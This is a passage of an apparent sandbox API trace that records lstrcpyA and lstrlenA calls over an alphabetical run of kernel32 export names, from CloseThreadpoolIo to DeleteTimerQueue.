lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.709] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.709] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.709] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.709] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.709] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.709] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.709] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.709] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.709] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.709] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.709] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.710] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.710] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.710] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.710] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.710] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.710] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.710] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.710] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.710] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.710] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.710] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.710] lstrlenA (lpString="COPYFILEA") returned 9 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.710] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.710] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.710] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.710] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.710] lstrlenA (lpString="COPYFILEW") returned 9 [0086.710] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.710] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.711] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.711] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.711] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.711] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.711] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.711] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.711] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.711] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.711] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.711] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.711] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.711] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.711] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.711] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.711] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.711] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.711] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.711] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.712] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.712] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.712] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.712] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.712] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.712] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.712] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.712] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.712] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.712] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.712] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.712] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.712] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.712] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.712] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.712] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.712] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.712] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.712] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.713] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.713] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.713] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.713] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.713] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.713] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.713] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.713] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.713] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.713] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.713] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.713] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.713] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.713] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.713] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.713] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.713] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.713] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.714] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.714] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.714] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.714] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.714] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.714] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.714] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.714] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.714] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.714] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.714] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.714] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.714] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.714] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.714] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.714] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.714] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.714] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.714] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.715] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.715] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.715] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.715] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.715] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.715] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.715] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.715] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.715] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.715] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.715] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.715] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.715] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.715] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.715] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.715] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.715] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.715] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.716] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.716] lstrlenA (lpString="DELETEATOM") returned 10 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.716] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.716] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.716] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.716] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.716] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.716] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.716] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.716] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.716] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.716] lstrlenA 